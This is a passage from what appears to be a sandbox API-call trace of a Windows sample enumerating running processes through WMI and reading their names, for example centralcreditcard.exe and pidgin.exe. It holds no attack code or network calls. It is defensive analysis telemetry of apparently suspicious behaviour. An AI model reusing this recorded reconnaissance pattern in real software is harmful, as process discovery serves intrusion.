[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.722] IUnknown:Release (This=0x500344) returned 0x1 [0279.723] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57162f0) returned 0x0 [0279.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x57162f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.723] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57162f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719018) returned 0x0 [0279.723] WbemDefPath:IUnknown:Release (This=0x57162f0) returned 0x0 [0279.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719018) returned 0x0 [0279.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.724] WbemDefPath:IUnknown:AddRef (This=0x5719018) returned 0x3 [0279.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716300) returned 0x0 [0279.724] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716300, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.724] WbemDefPath:IUnknown:Release (This=0x5716300) returned 0x3 [0279.725] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.725] WbemDefPath:IUnknown:Release (This=0x5719018) returned 0x2 [0279.725] WbemDefPath:IUnknown:Release (This=0x5719018) returned 0x1 [0279.725] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719018, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719018) returned 0x0 [0279.725] WbemDefPath:IUnknown:AddRef (This=0x5719018) returned 0x3 [0279.725] WbemDefPath:IUnknown:Release (This=0x5719018) returned 0x2 [0279.725] WbemDefPath:IWbemPath:SetText (This=0x5719018, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2288\"") returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.725] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.726] IWbemClassObject:Get (in: This=0x5713a48, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d740c*=0, plFlavor=0x27d7410*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x27d740c*=8, plFlavor=0x27d7410*=0) returned 0x0 [0279.726] IWbemClassObject:Get (in: This=0x5713a48, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d740c*=8, plFlavor=0x27d7410*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x27d740c*=8, plFlavor=0x27d7410*=0) returned 0x0 [0279.726] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716330, puReturned=0x27bb39c | out: apObjects=0x5716330*=0x5713be0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.727] IMarshal:GetUnmarshalClass (in: This=0x5713be4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.727] IUnknown:Release (This=0x5713be4) returned 0x3 [0279.728] IWbemClassObject:Get (in: This=0x5713be0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.728] IWbemClassObject:Get (in: This=0x5713be0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.728] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.728] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.728] IUnknown:Release (This=0x500344) returned 0x1 [0279.729] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716330) returned 0x0 [0279.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716330, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.729] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716330, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57190f8) returned 0x0 [0279.729] WbemDefPath:IUnknown:Release (This=0x5716330) returned 0x0 [0279.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57190f8) returned 0x0 [0279.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.730] WbemDefPath:IUnknown:AddRef (This=0x57190f8) returned 0x3 [0279.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716340) returned 0x0 [0279.730] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716340, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.730] WbemDefPath:IUnknown:Release (This=0x5716340) returned 0x3 [0279.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.731] WbemDefPath:IUnknown:Release (This=0x57190f8) returned 0x2 [0279.731] WbemDefPath:IUnknown:Release (This=0x57190f8) returned 0x1 [0279.731] WbemDefPath:IUnknown:QueryInterface (in: This=0x57190f8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57190f8) returned 0x0 [0279.731] WbemDefPath:IUnknown:AddRef (This=0x57190f8) returned 0x3 [0279.731] WbemDefPath:IUnknown:Release (This=0x57190f8) returned 0x2 [0279.731] WbemDefPath:IWbemPath:SetText (This=0x57190f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2284\"") returned 0x0 [0279.731] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.731] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.732] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.732] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.732] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.732] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.732] IWbemClassObject:Get (in: This=0x5713be0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d7ca0*=0, plFlavor=0x27d7ca4*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x27d7ca0*=8, plFlavor=0x27d7ca4*=0) returned 0x0 [0279.732] IWbemClassObject:Get (in: This=0x5713be0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d7ca0*=8, plFlavor=0x27d7ca4*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="pidgin.exe", varVal2=0x0), pType=0x27d7ca0*=8, plFlavor=0x27d7ca4*=0) returned 0x0 [0279.732] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716370, puReturned=0x27bb39c | out: apObjects=0x5716370*=0x5713d78, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.733] IMarshal:GetUnmarshalClass (in: This=0x5713d7c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.733] IUnknown:Release (This=0x5713d7c) returned 0x3 [0279.734] IWbemClassObject:Get (in: This=0x5713d78, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.734] IWbemClassObject:Get (in: This=0x5713d78, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.734] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.734] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.734] IUnknown:Release (This=0x500344) returned 0x1 [0279.735] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716370) returned 0x0 [0279.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716370, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.736] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716370, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57191d8) returned 0x0 [0279.736] WbemDefPath:IUnknown:Release (This=0x5716370) returned 0x0 [0279.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57191d8) returned 0x0 [0279.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.736] WbemDefPath:IUnknown:AddRef (This=0x57191d8) returned 0x3 [0279.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716380) returned 0x0 [0279.736] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716380, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.736] WbemDefPath:IUnknown:Release (This=0x5716380) returned 0x3 [0279.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.737] WbemDefPath:IUnknown:Release (This=0x57191d8) returned 0x2 [0279.737] WbemDefPath:IUnknown:Release (This=0x57191d8) returned 0x1 [0279.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x57191d8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57191d8) returned 0x0 [0279.737] WbemDefPath:IUnknown:AddRef (This=0x57191d8) returned 0x3 [0279.737] WbemDefPath:IUnknown:Release (This=0x57191d8) returned 0x2 [0279.737] WbemDefPath:IWbemPath:SetText (This=0x57191d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2268\"") returned 0x0 [0279.737] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.737] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.738] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.738] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.738] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.738] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.738] IWbemClassObject:Get (in: This=0x5713d78, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d8518*=0, plFlavor=0x27d851c*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x27d8518*=8, plFlavor=0x27d851c*=0) returned 0x0 [0279.738] IWbemClassObject:Get (in: This=0x5713d78, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d8518*=8, plFlavor=0x27d851c*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="scriptftp.exe", varVal2=0x0), pType=0x27d8518*=8, plFlavor=0x27d851c*=0) returned 0x0 [0279.739] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57163b0, puReturned=0x27bb39c | out: apObjects=0x57163b0*=0x5713f10, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.740] IMarshal:GetUnmarshalClass (in: This=0x5713f14, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.740] IUnknown:Release (This=0x5713f14) returned 0x3 [0279.740] IWbemClassObject:Get (in: This=0x5713f10, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, 